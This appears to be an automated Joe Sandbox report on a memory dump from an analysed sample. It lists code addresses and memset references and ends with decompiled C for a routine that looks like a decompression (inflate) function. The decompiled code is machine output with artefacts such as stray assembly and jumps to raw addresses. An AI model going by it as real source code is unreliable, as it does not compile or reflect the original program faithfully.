0x00405644
0x00405644
0x0040566f
0x0040566f
0x00405671
0x00405673
0x00405676
0x00405679
0x0040567f
0x0040584a
0x0040584a
0x00405850
0x00405853
0x00405859
0x004060f6
0x004060f6
0x004060fd
0x00406103
0x00406109
0x0040610c
0x0040610f
0x00406111
0x0040614e
0x0040614e
0x00406151
0x00405404
0x0040540b
0x00405413
0x00405418
0x00405426
0x00405426
0x0040542b
0x0040542c
0x0040542d
0x00405430
0x00405430
0x00405434
0x00405436
0x0040543c
0x00405444
0x00405444
0x00405448
0x0040544b
0x0040544e
0x0040541a
0x0040541a
0x0040541c
0x0040541f
0x0040541f
0x00405451
0x00405451
0x00405453
0x00405455
0x0040545c
0x00405463
0x00405466
0x00405469
0x0040546e
0x004054ae
0x004054b1
0x004054b4
0x004054b9
0x004054c5
0x004054c5
0x004054cd
0x004054d5
0x004054d8
0x004054dc
0x004054df
0x004054e1
0x004054e4
0x0040551f
0x0040551f
0x00405522
0x00405586
0x00405586
0x0040558b
0x00405590
0x00405590
0x00405593
0x00405596
0x0040559c
0x0040559f
0x004055a3
0x004055a6
0x004055a9
0x004055ac
0x004055ac
0x00000000
0x00405524
0x00405524
0x00405524
0x00405527
0x00000000
0x00405529
0x00405529
0x00405529
0x0040552e
0x00405534
0x00405536
0x00405539
0x00405540
0x00405540
0x00405542
0x00405544
0x00405547
0x0040554a
0x0040554d
0x00405550
0x00405550
0x00405554
0x00405557
0x0040555d
0x00405560
0x00405563
0x00405566
0x00405569
0x0040556c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040556c
0x00405527
0x00000000
0x004054e6
0x004054e6
0x004054e6
0x004054e6
0x004054e8
0x004054e9
0x004054ee
0x00000000
0x00000000
0x004054f4
0x004054fa
0x004061ff
0x004061ff
0x00406206
0x00000000
0x00405500
0x00405500
0x00405512
0x00405515
0x00405518
0x0040551a
0x00000000
0x0040551a
0x00000000
0x004054fa
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x00000000
0x004055f0
0x00000000
0x004055e8
0x004063a4
0x004063a4
0x004063a4
0x004063a7
0x00000000
0x004063a7
0x00405470
0x00405470
0x00405472
0x00405497
0x0040549c
0x004054a1
0x004054a3
0x004054a5
0x004054a8
0x004054ab
0x00000000
0x00405474
0x00000000
0x00405474
0x00405482
0x00405484
0x00405485
0x00405488
0x0040548a
0x0040548d
0x00405490
0x00405495
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405495
0x0040633c
0x00000000
0x0040633c
0x00405472
0x00406157
0x00406157
0x0040615c
0x0040615f
0x004061d6
0x004061d6
0x004061dd
0x004061e0
0x004061e3
0x004061e8
0x004061ee
0x004061f1
0x004061f4
0x004061f7
0x00000000
0x00406161
0x00406161
0x00406168
0x00406170
0x00406173
0x00406175
0x0040618f
0x0040618f
0x00406192
0x00000000
0x00406198
0x00406198
0x0040619d
0x0040619d
0x004061a0
0x004061a0
0x004061ae
0x004061b9
0x004061ba
0x004061bd
0x004061c0
0x004061c2
0x00000000
0x00000000
0x004061c8
0x004061c8
0x004061c9
0x004061cb
0x00000000
0x004061d1
0x004061d1
0x004061d1
0x00000000
0x004061d1
0x00000000
0x004061cb
0x00000000
0x004061a0
0x00406177
0x00406177
0x00406177
0x0040617a
0x0040617c
0x004053df
0x004053e2
0x00406347
0x00406347
0x00000000
0x00000000
0x00000000
0x00000000
0x00406182
0x00406182
0x00406182
0x00406184
0x00000000
0x0040618a
0x0040618a
0x00000000
0x0040618a
0x00406184
0x0040617c
0x00000000
0x004053e8
0x004053eb
0x004053ed
0x004053ef
0x004053f0
0x004053f2
0x004053f5
0x004053f8
0x004053fb
0x00406161
0x00000000
0x0040615f
0x00406113
0x00406113
0x00406113
0x00406115
0x0040613a
0x0040613f
0x0040613f
0x00406144
0x00406146
0x00406148
0x00406148
0x00406148
0x0040614b
0x00000000
0x00406117
0x00406117
0x00406117
0x00406117
0x0040611a
0x00000000
0x00000000
0x00406120
0x00406125
0x00406127
0x00406128
0x0040612b
0x0040612d
0x00406130
0x00406133
0x00406136
0x00406138
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406138
0x00406331
0x00406331
0x00000000
0x00406331
0x00406115
0x0040585f
0x0040585f
0x0040585f
0x0040585f
0x00405863
0x00000000
0x00000000
0x00405869
0x00405869
0x0040586c
0x0040588f
0x00405891
0x00405894
0x00405897
0x0040589a
0x0040589d
0x0040589d
0x0040589f
0x004058a2
0x004058a5
0x004058a8
0x00405a6b
0x00405a6b
0x00405a6e
0x00406364
0x00406364
0x0040636b
0x00000000
0x00405a74
0x00405a74
0x00405a74
0x00405a77
0x00405b46
0x00405b46
0x00405b46
0x00405b48
0x00405b48
0x00405b48
0x00405b4b
0x00405b4e
0x00000000
0x00000000
0x00405b54
0x00405b54
0x00405b5b
0x00405b5e
0x00405b60
0x00405b8f
0x00405b8f
0x00405b9a
0x00405ba2
0x00405ba5
0x00405ba8
0x00405baf
0x00405bb1
0x00405bb3
0x00405bb5
0x00405bb8
0x00405bbb
0x00405bc2
0x00405bc5
0x00405bc7
0x00405bca
0x00000000
0x00405b62
0x00405b62
0x00405b62
0x00405b62
0x00405b65
0x00000000
0x00000000
0x00405b6b
0x00405b70
0x00405b72
0x00405b73
0x00405b76
0x00405b78
0x00405b7b
0x00405b7e
0x00405b81
0x00405b88
0x00405b8b
0x00405b8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405b8d
0x00406285
0x00406285
0x00000000
0x00406285
0x00000000
0x00405b60
0x00405bd0
0x00000000
0x00405a7d
0x00405a7d
0x00405a7d
0x00405a82
0x00405a83
0x00405a84
0x00405a85
0x00405a86
0x00405a88
0x00405a8a
0x00405a8c
0x00405a8d
0x00405a8f
0x00405a91
0x00405a98
0x00405a9e
0x00405aa6
0x00405aa9
0x00405aae
0x00405ab3
0x00405ab8
0x00405abd
0x00405ac5
0x00405acd
0x00405ad5
0x00405add
0x00405ae5
0x00405aeb
0x00405af3
0x00405af7
0x00405afc
0x00405b01
0x00405b06
0x00405b0b
0x00405b10
0x00405b15
0x00405b1d
0x00405b22
0x00405b2a
0x00405b34
0x00405b3e
0x00000000
0x00405b3e
0x00405a77
0x004058ae
0x004058ae
0x004058b0
0x004058b3
0x004058b5
0x004058dc
0x004058de
0x004058e1
0x004058e3
0x004058e5
0x004058e8
0x004058e8
0x004058ea
0x004058ea
0x004058ea
0x004058ed
0x004058f0
0x00000000
0x00000000
0x004058f2
0x004058f2
0x004058f4
0x00405932
0x00405932
0x00405935
0x0040624f
0x0040624f
0x00000000
0x0040593b
0x0040593b
0x0040593b
0x0040593d
0x0040593e
0x00405945
0x00405946
0x00000000
0x00405946
0x004058f6
0x004058f6
0x004058f6
0x004058f9
0x0040591f
0x0040591f
0x00405926
0x00405929
0x0040592c
0x0040592d
0x00000000
0x004058fb
0x004058fb
0x004058fb
0x004058fb
0x004058fe
0x00000000
0x00000000
0x00405904
0x00405909
0x0040590b
0x0040590c
0x0040590e
0x00405911
0x00405914
0x00405917
0x0040591a
0x00000000
0x0040591c
0x0040591c
0x0040591c
0x00000000
0x0040591c
0x00000000
0x0040591a
0x00406244
0x00406244
0x00000000
0x00406244
0x004058f9
0x00000000
0x004058f4
0x0040594b
0x0040595e
0x00405965
0x0040597a
0x0040597d
0x00406352
0x00406352
0x00406359
0x00000000
0x00405983
0x00405983
0x00405983
0x00405986
0x00405986
0x00405986
0x00405988
0x00000000
0x00000000
0x0040598e
0x0040598e
0x00405990
0x004059ec
0x004059ec
0x004059ef
0x004059ef
0x004059ef
0x004059f1
0x00000000
0x00000000
0x00405a01
0x00405a01
0x00405a04
0x00405a06
0x00405a20
0x00405a20
0x00405a23
0x00405a25
0x00406277
0x00406277
0x0040627a
0x00000000
0x00405a2b
0x00405a2b
0x00405a2b
0x00405a30
0x00405a32
0x00405a36
0x00405a39
0x00405a3b
0x00405a44
0x00405a3d
0x00405a3d
0x00405a3f
0x00405a3f
0x00405a46
0x00405a4b
0x00405a4b
0x00405a54
0x00405a59
0x00405a5b
0x00405a5e
0x00405a61
0x00405a63
0x00405a66
0x00000000
0x00405a66
0x00405a08
0x00405a08
0x00405a08
0x00405a0b
0x00405a12
0x00000000
0x00405a12
0x00000000
0x00405a06
0x004059f3
0x004059f3
0x004059f8
0x00000000
0x00405992
0x00405992
0x00405992
0x00405995
0x004059b8
0x004059b8
0x004059bb
0x004059be
0x004059c1
0x004059c4
0x004059cc
0x004059cf
0x004059d2
0x004059d5
0x00406265
0x00406265
0x0040626c
0x00000000
0x004059db
0x004059db
0x004059de
0x004059e1
0x004059e6
0x004059e7
0x00000000
0x004059e7
0x00405997
0x00405997
0x00405997
0x00405997
0x0040599a
0x00000000
0x00000000
0x004059a0
0x004059a5
0x004059a7
0x004059a8
0x004059aa
0x004059ad
0x004059b0
0x004059b3
0x004059b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004059b6
0x0040625a
0x0040625a
0x00000000
0x0040625a
0x00405995
0x00000000
0x00405990
0x00000000
0x00405986
0x004058b7
0x004058b7
0x004058b7
0x004058b7
0x004058ba
0x00000000
0x00000000
0x004058c0
0x004058c5
0x004058c7
0x004058ca
0x004058cc
0x004058cf
0x004058d2
0x004058d5
0x004058d8
0x004058da
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004058da
0x00406239
0x00406239
0x00000000
0x00406239
0x004058b5
0x0040586e
0x0040586e
0x0040586e
0x0040586e
0x00405871
0x00000000
0x00000000
0x00405877
0x0040587c
0x0040587e
0x0040587f
0x00405881
0x00405884
0x00405887
0x0040588a
0x0040588d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040588d
0x0040622e
0x0040622e
0x00000000
0x0040622e
0x00000000
0x0040586c
0x004062b1
0x004062b3
0x004062b6
0x004062b8
0x004062e2
0x004062e2
0x004062e7
0x004062ea
0x004062ec
0x004062ee
0x004062f1
0x004062f3
0x004062f5
0x004062f5
0x004062f5
0x004062f8
0x00000000
0x00000000
0x004062fa
0x004062fa
0x004062fb
0x004062fe
0x00406300
0x00000000
0x00000000
0x00000000
0x00406300
0x004062f5
0x00406302
0x00406307
0x00406307
0x0040630b
0x0040630e
0x00406311
0x00406314
0x00406316
0x00406319
0x0040631d
0x00406320
0x00406324
0x00406442
0x00406442
0x00406442
0x00406444
0x0040644a
0x0040644a
0x00000000
0x0040632a
0x0040632a
0x0040632a
0x004063f3
0x004063f3
0x004063f3
0x004063f6
0x004063f9
0x00000000
0x00000000
0x004063fb
0x004063fb
0x004063fd
0x0040640a
0x0040640a
0x0040640d
0x00406410
0x004063d7
0x004063d7
0x004063dd
0x004063dd
0x004063e0
0x00000000
0x00406412
0x00406412
0x004063ba
0x004063ba
0x004063ba
0x004063bd
0x00000000
0x00000000
0x004063bf
0x004063c4
0x004063c6
0x004063c9
0x004063cb
0x004063cc
0x004063cf
0x004063d2
0x00000000
0x004063d4
0x004063d4
0x004063d4
0x00000000
0x004063d4
0x00000000
0x004063d2
0x0040641c
0x0040641c
0x00000000
0x0040641c
0x004063ff
0x004063ff
0x004063ff
0x00406402
0x00406414
0x00406414
0x00000000
0x00406404
0x00406404
0x00406404
0x00406407
0x004063e3
0x004063e3
0x004063ec
0x004063ef
0x004063ef
0x004063f0
0x00000000
0x004063f0
0x00406402
0x00000000
0x004063fd
0x00000000
0x004063f3
0x004062c0
0x00000000
0x004062c0
0x004062c0
0x004062c0
0x004062c3
0x00000000
0x00000000
0x004062c9
0x004062ce
0x004062d0
0x004062d3
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004062e0
0x004063b2
0x004063b2
0x00000000
0x004063b2
0x004062b8
0x00405685
0x00405685
0x00405685
0x00405688
0x0040568a
0x0040568e
0x00405690
0x00405693
0x00405696
0x0040569e
0x004056a3
0x004056a6
0x004056a6
0x004056a9
0x004056a9
0x004056b3
0x004056bb
0x004056be
0x004056c0
0x004056c9
0x004056c9
0x004056ce
0x004056cf
0x004056d0
0x004056d1
0x004056d1
0x004056d5
0x004056d7
0x004056dd
0x004056e5
0x004056e5
0x004056e9
0x004056ec
0x004056c2
0x004056c2
0x004056c4
0x004056c4
0x004056ef
0x004056ef
0x004056f2
0x004056f4
0x004056f9
0x004056fc
0x004056fe
0x00405701
0x00405707
0x00405847
0x00405847
0x00405847
0x00405847
0x00000000
0x0040570d
0x0040570d
0x0040570d
0x00405710
0x00405716
0x00405719
0x004055e8
0x004055e8
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x00000000
0x004055f0
0x0040556e
0x0040556e
0x0040556e
0x00405572
0x00405577
0x00405578
0x0040557a
0x0040557c
0x0040557f
0x00405582
0x00405584
0x004055d6
0x004055d6
0x004055db
0x004055df
0x004055e2
0x004055e2
0x004055e5
0x004055e5
0x004055e5
0x004055e5
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x00000000
0x004055f0
0x004055b1
0x004055b1
0x004055b4
0x004055b7
0x004055ba
0x004055bd
0x004055c0
0x004055c0
0x004055c4
0x004055c9
0x004055ca
0x004055cc
0x004055ce
0x004055d1
0x004055d4
0x00000000
0x00000000
0x00000000
0x004055d4
0x00405707
0x0040567f
0x00000000
0x0040571e
0x0040571e
0x00405721
0x004057d3
0x004057da
0x004057e2
0x004057e5
0x004057e7
0x004057f8
0x004057f8
0x004057fd
0x004057fe
0x004057ff
0x00405800
0x00405800
0x00405804
0x00405806
0x0040580a
0x0040580c
0x00405814
0x00405814
0x00405818
0x0040581b
0x004057e9
0x004057e9
0x004057eb
0x004057ee
0x004057f3
0x004057f3
0x0040581e
0x0040581e
0x00405820
0x00405822
0x00405825
0x00405828
0x0040582e
0x00000000
0x00405830
0x00405830
0x00405830
0x00405833
0x00405836
0x0040621c
0x0040621c
0x00406223
0x00000000
0x0040583c
0x0040583c
0x0040583c
0x0040583f
0x00000000
0x0040583f
0x00405836
0x00405727
0x00405727
0x00405727
0x0040572a
0x004057af
0x004057af
0x004057b6
0x004057b9
0x004057be
0x004057c4
0x004057c7
0x004057ca
0x004057ca
0x004057cd
0x00000000
0x00405730
0x00405730
0x00405730
0x00405732
0x00405737
0x0040573f
0x00405741
0x00405754
0x00405754
0x00405757
0x00000000
0x00405759
0x00405759
0x0040575e
0x00405761
0x00405761
0x0040576f
0x0040577a
0x0040577b
0x0040577e
0x00405780
0x00000000
0x00000000
0x00405782
0x00405782
0x00405785
0x00405787
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405787
0x00000000
0x00405761
0x00405743
0x00405743
0x00405743
0x00405746
0x00405748
0x00405789
0x00405789
0x0040578c
0x0040578c
0x0040578f
0x00406211
0x00406211
0x00000000
0x00000000
0x00000000
0x00000000
0x0040574a
0x0040574a
0x0040574a
0x0040574c
0x004057d0
0x004057d0
0x00000000
0x00405752
0x00405752
0x00000000
0x00405752
0x0040574c
0x00405748
0x00000000
0x00405795
0x00405798
0x0040579a
0x0040579c
0x0040579d
0x0040579f
0x004057a2
0x004057a5
0x004057a8
0x004057a8
0x00000000
0x004057ad
0x0040572a
0x00000000
0x00405721
0x004055e8
0x00405c54
0x00405c63
0x00405c6d
0x00405c83
0x00405c99
0x00405ca2
0x00405ca7
0x00405caa
0x00405cad
0x00405cb0
0x00405cb2
0x00405cb4
0x00405cb4
0x00405cc0
0x00405cc0
0x00405cc0
0x00405cc4
0x00405cc5
0x00405ccc
0x00405ccc
0x00405cc0
0x00405cd0
0x00405cd0
0x00405cd5
0x00405cd6
0x00405cd7
0x00405cd8
0x00405cd9
0x00405cd9
0x00405cdf
0x00405ce5
0x00405ce8
0x00405cf0
0x00405cf0
0x00405cf0
0x00405cf9
0x00405cfb
0x00405cfd
0x00405d04
0x00405d07
0x00405d10
0x00405d17
0x00405d19
0x00405d1c
0x00405d25
0x00405d27
0x00405d2e
0x00405d31
0x00405d31
0x00405d3c
0x00405d3f
0x00405d45
0x00405d48
0x00405d4a
0x00405d51
0x00405d5c
0x00405d5c
0x00405d5f
0x00405d66
0x00405d6d
0x00405d70
0x00405d76
0x00405d76
0x00405d80
0x00405d80
0x00405d85
0x00405d85
0x00405d89
0x00405d8c
0x00405d8e
0x00405d94
0x00405d94
0x00405d9b
0x00405d9f
0x00405da6
0x00405da9
0x00405dab
0x00000000
0x00405db0
0x00405db0
0x00405dbb
0x00405dbe
0x00405dbf
0x00405dc1
0x00405dc4
0x00405dc4
0x00405dc8
0x00405dc8
0x00405dcb
0x00405dcb
0x00405dce
0x00405e1d
0x00405e2d
0x00405e30
0x00405e33
0x00405e36
0x00405e39
0x00405e3c
0x00405e3e
0x00405e43
0x00405e46
0x00405e48
0x00405e48
0x00405e4b
0x00405e4e
0x00405e4e
0x00405e51
0x00405e51
0x00405e54
0x00405e57
0x00405e59
0x00405e59
0x00405e59
0x00405e5c
0x00405e5f
0x00405e62
0x00405e62
0x00405e62
0x00405e70
0x00405e75
0x00405e79
0x00405e7c
0x00405e94
0x00405e7e
0x00405e81
0x00405e85
0x00405e88
0x00405e8a
0x00405e8d
0x00405e90
0x00405e90
0x00405e97
0x00405e97
0x00405e97
0x00405e97
0x00405e97
0x00405e9c
0x00405e9f
0x00405e9f
0x00405ea1
0x00405ea6
0x00405ea6
0x00405eab
0x00405dd0
0x00405dd0
0x00405dd7
0x00405dda
0x00405ddd
0x00405de3
0x00405de9
0x00405de9
0x00405dee
0x00405def
0x00405df0
0x00405df1
0x00405df1
0x00405df6
0x00405dff
0x00405dff
0x00405e05
0x00405e05
0x00405e05
0x00405e08
0x00405e0a
0x00405e0d
0x00405e0d
0x00405e15
0x00405e15
0x00405de3
0x00405dce
0x00405eb3
0x00405eb3
0x00405eb6
0x00405eb7
0x00405eb7
0x00405ec1
0x00405ec6
0x00405ec6
0x00405ec7
0x00405ec7
0x00405ecb
0x004060e6
0x004060e6
0x00000000
0x00405ed1
0x00405ed1
0x00405ed1
0x00405ed1
0x00405ed3
0x00405ed3
0x00405ed3
0x00405ed6
0x00405ed6
0x00405edc
0x00405edf
0x00405ee1
0x00000000
0x00000000
0x00405ee7
0x00405ee7
0x00405eea
0x00405fa2
0x00405fa9
0x00405fb1
0x00405fb4
0x00405fb6
0x00405fc7
0x00000000
0x00405fd0
0x00405fd0
0x00405fd0
0x00405fd5
0x00405fd7
0x00405fde
0x00405fe6
0x00405fe9
0x00405fe9
0x00405fb8
0x00405fb8
0x00405fba
0x00405fbd
0x00405fc2
0x00405fc2
0x00405fed
0x00405fed
0x00405fef
0x00405ff1
0x00405ff4
0x00405ff7
0x00405ffa
0x0040600c
0x0040600c
0x0040601c
0x0040601c
0x00406023
0x00406026
0x00406028
0x00406050
0x0040605e
0x00406061
0x00406068
0x0040606b
0x0040606d
0x00406071
0x00406074
0x00406077
0x00406083
0x00406083
0x00406079
0x00406079
0x00406079
0x00406085
0x00406090
0x00406099
0x0040609c
0x0040609e
0x00405ed3
0x00405ed3
0x00000000
0x0040602a
0x0040602a
0x0040602a
0x0040602a
0x0040602d
0x00000000
0x00000000
0x00406033
0x00406038
0x0040603a
0x0040603b
0x0040603e
0x00406040
0x00406043
0x00406046
0x00406049
0x0040604b
0x00000000
0x0040604d
0x0040604d
0x0040604d
0x00000000
0x0040604d
0x00000000
0x0040604b
0x004062a6
0x004062a6
0x00000000
0x004062a6
0x0040600e
0x0040600e
0x0040600e
0x00406011
0x00406013
0x00406388
0x00406388
0x0040638b
0x00000000
0x00406019
0x00406019
0x00406019
0x00000000
0x00406019
0x00406013
0x00405ffc
0x00405ffc
0x00405ffc
0x00405fff
0x00406006
0x00000000
0x00406006
0x00405ef0
0x00405ef0
0x00405ef5
0x00405ef8
0x00405f7e
0x00405f7e
0x00405f85
0x00405f88
0x00405f8d
0x00405f93
0x00405f96
0x00405f99
0x00405f99
0x00405f9c
0x00000000
0x00405efe
0x00405efe
0x00405efe
0x00405f00
0x00405f05
0x00405f0d
0x00405f0f
0x00405f22
0x00405f22
0x00405f25
0x00000000
0x00405f27
0x00405f27
0x00405f2c
0x00405f2c
0x00405f30
0x00405f30
0x00405f3e
0x00405f49
0x00405f4a
0x00405f4d
0x00405f4f
0x00000000
0x00000000
0x00405f51
0x00405f51
0x00405f54
0x00405f56
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f56
0x00000000
0x00405f30
0x00405f11
0x00405f11
0x00405f11
0x00405f14
0x00405f16
0x00405f58
0x00405f58
0x00405f5b
0x00405f5b
0x00405f5e
0x0040629b
0x0040629b
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f18
0x00405f18
0x00405f18
0x00405f1a
0x00405f9f
0x00405f9f
0x00000000
0x00405f20
0x00405f20
0x00000000
0x00405f20
0x00405f1a
0x00405f16
0x00000000
0x00405f64
0x00405f67
0x00405f69
0x00405f6b
0x00405f6c
0x00405f6e
0x00405f71
0x00405f74
0x00405f77
0x00405f77
0x00000000
0x00405f7c
0x00405ef8
0x00000000
0x00405eea
0x004060a6
0x004060a9
0x004060ac
0x004060ae
0x004060b0
0x00406396
0x00406396
0x00406399
0x00000000
0x004060b6
0x004060b6
0x004060c2
0x004060d3
0x004060d3
0x004060dd
0x004060e3
0x00000000
0x004060e3
0x00000000
0x004060b0
0x00405ed3
0x00405d53
0x00405d53
0x00405d53
0x00405d56
0x00406376
0x00406376
0x0040637d
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d56
0x00000000
0x00405d51

APIs

memset.NTDLL ref: 00405BDE
memset.NTDLL ref: 00405C6D
memset.NTDLL ref: 00405C83
memset.NTDLL ref: 00405C99

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: ba979bc0cc70fe4fb0bfb8ad1f4ff8bf5d37371098c31128c140ce9aabe1a115
Instruction ID: 8a3d78111585ff9a8b33e87cd91726b96fd48e07272778a024c807810efccb44
Opcode Fuzzy Hash: ba979bc0cc70fe4fb0bfb8ad1f4ff8bf5d37371098c31128c140ce9aabe1a115
Instruction Fuzzy Hash: 2731B1B5E04615EBDB08CF64C885BEDBBB0FF55300F14406AE506BB680D378A651DF99

Uniqueness

Uniqueness Score: 0.00%

Function 00405A85, Relevance: 5.1, APIs: 4, Instructions: 79
COMMON

C-Code - Quality: 68%

			E00405A85(void* __eax, void* __ebx, void* __edi) {
				intOrPtr* _t597;
				void* _t598;
				signed int _t600;
				signed int _t603;
				signed int _t605;
				void* _t608;
				signed int _t609;
				signed int _t612;
				signed int _t614;
				signed int _t617;
				signed int _t618;
				signed int _t624;
				signed int _t625;
				void* _t628;
				signed int _t630;
				void* _t631;
				signed int _t641;
				signed int* _t651;
				signed int _t654;
				signed int _t671;
				signed int _t673;
				signed int _t675;
				signed int _t685;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t695;
				unsigned int _t698;
				void* _t699;
				signed int _t707;
				signed int _t710;
				signed int _t721;
				signed int _t725;
				signed int _t727;
				void* _t730;
				signed int _t732;
				signed int _t733;
				intOrPtr _t734;
				signed char _t738;
				intOrPtr* _t740;
				void* _t741;
				signed int _t749;
				signed int _t753;
				signed int _t758;
				signed int _t764;
				signed int _t767;
				void* _t769;
				intOrPtr _t782;
				intOrPtr _t783;
				intOrPtr _t784;
				signed int _t787;
				signed int _t791;
				void* _t797;
				signed int _t802;
				signed int _t804;
				signed int _t808;
				signed int _t812;
				signed int _t815;
				signed int _t819;
				void* _t824;
				signed int _t828;
				void* _t829;
				signed int _t834;
				void* _t835;
				void* _t836;
				signed int _t841;
				signed int _t842;
				signed char _t844;
				signed int _t845;
				void* _t847;
				void* _t851;
				signed int _t853;
				intOrPtr _t854;
				signed char _t860;
				signed int _t861;
				signed int _t862;
				signed char _t863;
				signed char _t864;
				intOrPtr _t866;
				void* _t869;
				void* _t870;
				void* _t871;
				signed int _t874;
				signed int _t877;
				void* _t878;
				void* _t879;
				void* _t880;
				void* _t881;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t885;
				signed char _t894;
				signed int _t896;
				void* _t897;
				void* _t898;
				signed int _t901;
				signed int _t902;
				signed char _t903;
				intOrPtr _t905;
				intOrPtr _t907;
				void* _t910;
				signed char _t911;
				signed char _t912;
				signed char _t913;
				signed int _t917;
				signed char _t922;
				void* _t923;
				void* _t924;
				signed int _t927;
				signed char* _t932;
				signed int _t936;
				signed char _t940;
				signed int _t941;
				signed char _t944;
				signed int _t945;
				void* _t953;
				signed int _t968;
				signed int _t969;
				signed int _t972;
				signed int _t974;
				signed int _t978;
				signed int* _t979;
				signed char* _t984;
				void* _t985;
				void* _t990;
				signed int _t991;
				signed int _t994;
				signed int _t995;
				signed int _t997;
				signed int _t999;
				signed int _t1000;
				signed int _t1003;
				signed int _t1004;
				int _t1005;
				int _t1007;
				signed int _t1008;
				unsigned int _t1011;
				void* _t1015;
				intOrPtr _t1016;
				signed int _t1017;
				signed int _t1021;
				signed char _t1025;
				void* _t1029;
				signed char _t1030;
				signed int _t1031;
				void* _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1039;
				void* _t1041;
				int _t1046;
				signed int _t1047;
				signed int _t1049;
				signed int _t1050;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed char _t1064;
				void* _t1065;
				void* _t1067;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t597 = __eax + 1 - 0x20;
					 *_t597 =  *_t597 + _t597;
					_t847 = __ebx + _t597;
					_t598 = _t597 + 1;
					 *_t598 =  *_t598 ^ _t598;
					 *_t598 = _t598 +  *_t598;
					 *0xde0 =  *0xde0 + _t598;
					memset(_t598, ??, ??);
					asm("movdqa xmm0, [0x411ae0]");
					_t1068 = _t1067 + 0xc;
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqu [edi+0x70], xmm0");
					asm("movdqu [edi+0x80], xmm0");
					asm("movdqu [edi+0x90], xmm0");
					asm("movdqu [edi+0xa0], xmm0");
					asm("movdqu [edi+0xb0], xmm0");
					asm("movdqu [edi+0xc0], xmm0");
					_t1029 = __edi + 0xd0;
					asm("movdqa xmm0, [0x411af0]");
					asm("movdqu [edi], xmm0");
					asm("movdqu [edi+0x10], xmm0");
					asm("movdqu [edi+0x20], xmm0");
					asm("movdqu [edi+0x30], xmm0");
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqa xmm0, [0x411ad0]");
					asm("movdqu [edi+0x70], xmm0");
					asm("movq [edi+0x80], xmm0");
					 *((intOrPtr*)(_t1029 + 0x88)) = 0x8080808;
					 *((intOrPtr*)(_t1029 + 0x8c)) = 0x8080808;
					_t1030 =  *(_t1065 - 0x14);
					while(1) {
						L141:
						_t600 =  *(_t1030 + 0x18);
						if(_t600 >= 0) {
							break;
						}
						L218:
						_t968 =  *(_t1065 - 4);
						while(1) {
							L39:
							_t860 =  *(_t1065 - 0x20) - _t847;
							__eflags = _t860 - 4;
							if(_t860 < 4) {
								goto L58;
							}
							L40:
							_t1030 =  *(_t1065 - 0x14);
							__eflags =  *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) - 2;
							if( *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1050 - 0xf;
								if(_t1050 < 0xf) {
									_t1017 =  *(_t847 + 1) & 0x000000ff;
									_t860 = _t1050;
									_t733 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1017 << 0x00000008 | _t733) << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
								}
								_t618 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t618;
								__eflags = _t618;
								if(_t618 < 0) {
									L45:
									goto 0x421333;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t685 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t618 = (_t685 & 0x00000001) +  !_t847;
										_t847 =  *((short*)(_t1030 + 0x960 + _t618 * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L44:
									_t860 = _t618 >> 9;
								}
								L48:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 & 0x00000100;
								if((_t861 & 0x00000100) != 0) {
									L84:
									_t862 = _t861 & 0x000001ff;
									 *(_t1065 - 8) = _t862;
									__eflags = _t862 - 0x100;
									if(_t862 != 0x100) {
										L219:
										_t608 = _t862 * 4 - 0x404;
										_t863 =  *(_t608 + 0x411010);
										_t609 =  *(_t608 + 0x411a48);
										 *(_t1065 - 0x38) = _t863;
										 *(_t1065 - 8) = _t609;
										__eflags = _t863;
										if(_t863 == 0) {
											L225:
											__eflags = _t1050 - 0xf;
											if(_t1050 >= 0xf) {
												L3:
